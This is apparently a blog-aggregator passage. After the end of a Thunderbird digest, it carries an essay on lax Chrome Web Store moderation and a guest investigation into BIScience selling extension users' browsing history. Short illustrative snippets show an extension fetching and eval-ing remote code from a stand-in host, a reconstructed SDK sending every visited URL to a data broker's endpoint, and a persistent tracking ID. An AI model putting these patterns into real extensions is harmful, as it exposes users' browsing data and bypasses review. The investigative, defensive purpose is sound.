Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between some of the factions and solutions which are in place to provide quantum-resistant solutions in a post-quantum world. To provide ourselves with the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta, and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway; we have already uplifted some features, now merged with 135.0 Beta. Follow along via Meta bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir PalantChrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

Screenshot of the Chrome download page. A subtitle “Extend your experience” is visible with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store.” Next to it a screenshot of the Chrome browser and some symbols on top of it representing various extensions.

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much about being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items and will take action accordingly. Please refer to the possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea behind not commenting on policy enforcement actions is to hide the internal decision making from bad actors, so that they cannot game the process. If that’s the theory, however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or through the adjustments demanded by Google. It’s only me, the reporter of these issues, who is left guessing.

But, and this is a positive development, I’ve received confirmation that both these reports are being worked on. This is more than I usually get from Google, which is silence. And typically no visible reaction either, at least until a report starts circulating in media publications and forces Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way, right?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

OK, that’s clearly referring to the old Chrome Web Store. But we understand, of course, that they mean the “Flag concern” link, which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere, which might result in… what, exactly? Judging by malicious extensions that users have been vocally complaining about, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation is neither of those. If we try the form nevertheless, it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course, but the options available there are genuinely legal issues: intellectual property, court orders or violations of hate speech laws. This is another dead end.

It took a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I get that Google must be receiving lots of nonsense reports, and they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP), meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste; pretty much no issue would qualify for the program. But at least it was a reliable way to report issues that might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

Not that I was ever very convinced of DDPRP’s performance. I used the program twice. The first time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report concerned the malicious PDF Toolbox extension. It was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, though that might have been due to the media coverage. The real benefit of the program was this: it was a documented way of reaching a human being at Google who would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google had already been made aware of this particular trick a year before my blog post. And again, for some reason, Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning the moderation of reviews, Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, given their continuous stream of incoming five-star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five-star reviews on a single day in September – and only a single (negative) review since then. I pointed out that this is a consistent pattern across all extensions from this account; for example, another extension (with merely 30 users) received 9 five-star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very  user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, everybody except the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes as overwhelmingly positive or meaningless review content. At this point, any user rating averaging above 4 stars has likely been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through the 920 spammy extensions I reported recently, I found that most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot be very thorough.

To provide a more tangible example: Chrome Web Store currently has the Blaze VPN, Safum VPN and Snap VPN extensions carrying the “Featured” badge. These extensions (along with Ishaan VPN, which has barely any users) belong to the PDF Toolbox cluster that produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN, which was removed from Chrome Web Store in 2021. They also don’t even work: no connection ever succeeds. The extension not working is something users of Nucleus VPN had already complained about, a problem the extension compensated for with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things that can easily be verified automatically: user count, Manifest V3, a claim to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on user interface and general extension quality don’t seem to be very high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge, because Chrome Web Store’s search algorithm appears to weigh the badge considerably when ranking extensions.

How did Google get into this mess?

Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extension ecosystem was Mozilla’s, which had been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome’s developers of course noticed: essentially unrestricted privileges meant a high damage potential (both intentional and unintentional), which necessitated very thorough reviews before extensions could be published on the Mozilla Add-ons website. And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Chrome’s extension platform was meant to address all these issues. It pioneered sandboxed extensions, which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approach.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

It’s only now, with the introduction of Manifest V3, that Chrome finally prohibits remotely hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that had long been established at Mozilla when Google entered the market in 2011.
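
To illustrate what “remotely hosted code” means in practice: under Manifest V2, nothing stopped an extension from downloading and executing fresh JavaScript after review, so the code reviewers saw told them little about what the extension would later do. A simplified illustration of that pattern (not any specific extension’s code):

```ts
// Manifest V2 era: an extension with "unsafe-eval" in its content security
// policy could fetch code from its own server at runtime and execute it,
// bypassing whatever was reviewed. Simplified illustration only.
async function loadRemoteLogic(): Promise<void> {
  const response = await fetch("https://updates.example.com/payload.js");
  const code = await response.text();

  // Executes code the reviewers never saw. Manifest V3 forbids this:
  // all executable code now has to ship inside the extension package.
  // eslint-disable-next-line no-eval
  eval(code);
}
```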

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how to request more privileges for their extensions while fending off complaints from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.
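
For reference, this is roughly the manifest configuration behind that “read and change all your data on all websites” prompt. The fragment below is illustrative; a content blocker and a data-harvesting extension can both end up requesting exactly the same thing, which is why the prompt tells users so little.

```ts
// Illustrative Manifest V3 fragment that triggers Chrome's
// "Read and change all your data on all websites" warning at install time.
const manifestFragment = {
  manifest_version: 3,
  name: "Some Extension",           // placeholder name
  version: "1.0.0",
  host_permissions: ["<all_urls>"], // access to every website
  permissions: ["tabs", "webNavigation"], // visited URLs become visible
};
```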

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Numbers 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies that can put a hundred employees on devising new tricks to avoid detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, who have hundreds of other extensions in the pipeline. Tracing the relationships between extensions, on the other hand, and taking down entire clusters – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.

In fact, Google has a significant incentive to keep one particular class of extensions down, so one might even suspect intent behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir Palant
BIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of a website citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily. Caption: Screenshot of claims on the BIScience website

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.
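
The mechanics behind such an identifier are trivial: a random value is generated once, stored, and attached to every reported event, which is exactly what makes the resulting “anonymous” data linkable over years. A sketch of that general pattern (illustrative only, not BIScience’s actual code):

```ts
// Illustrative sketch: a per-install identifier that never changes.
// Every reported URL carries this ID, so years of browsing history can be
// linked back to one device, and often to one person.
async function getDeviceId(): Promise<string> {
  const stored = await chrome.storage.local.get("device_id");
  if (typeof stored.device_id === "string") return stored.device_id;

  const id = crypto.randomUUID();                     // generated once...
  await chrome.storage.local.set({ device_id: id });  // ...and kept forever
  return id;
}
```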

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt, allowing the sale of user data obtained under false pretenses.

We have the receipts: contracts, emails, and more to prove that BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs on servers, so they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.
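
To show what purely client-side blocking looks like: the filter rules ship with (or are generated inside) the extension and the matching happens in the browser, so no visited URL ever has to leave the device. A minimal sketch using Chrome’s declarativeNetRequest API follows; it assumes the "declarativeNetRequest" permission, and the filter itself is illustrative.

```ts
// Minimal sketch of client-side blocking via declarativeNetRequest:
// the browser evaluates the rules locally, no URL is sent to any server.
chrome.declarativeNetRequest.updateDynamicRules({
  removeRuleIds: [1], // replace any previous rule with this ID
  addRules: [
    {
      id: 1,
      priority: 1,
      action: { type: chrome.declarativeNetRequest.RuleActionType.BLOCK },
      condition: {
        urlFilter: "||ads.example.com^", // illustrative filter only
        resourceTypes: [chrome.declarativeNetRequest.ResourceType.SCRIPT],
      },
    },
  ],
});
```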

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can claim to offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs just enough functionality to pass casual examination. We confirmed this endpoint also collects user data for resale, which is unrelated to the safe browsing protection.
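
Based on the behavior described above, the integration pattern looks roughly like this: every URL is sent to the BIScience-controlled endpoint, the response drives the nominal “safe browsing” feature, and the data collection is a side effect of the lookup itself. The following is a hypothetical reconstruction; the endpoint path, parameters and response shape are our assumptions, not the actual SDK code.

```ts
// Hypothetical reconstruction of the dual-purpose lookup pattern described
// above: the nominal "feature" is the verdict, the data collection is the
// request itself. Endpoint path and response shape are assumptions.
const LOOKUP_ENDPOINT = "https://sclpfybn.com/check"; // path is illustrative

async function checkUrl(url: string, userId: string): Promise<void> {
  // Sending the raw URL is the point: the server now has the full browsing
  // history regardless of what the verdict turns out to be.
  const response = await fetch(LOOKUP_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ url, user_id: userId }),
  });
  const verdict: { malicious?: boolean } = await response.json();

  if (verdict.malicious) {
    // The user-facing "safe browsing" feature that justifies the access.
    console.warn(`Blocked potentially malicious site: ${url}`);
  }
}
```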

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

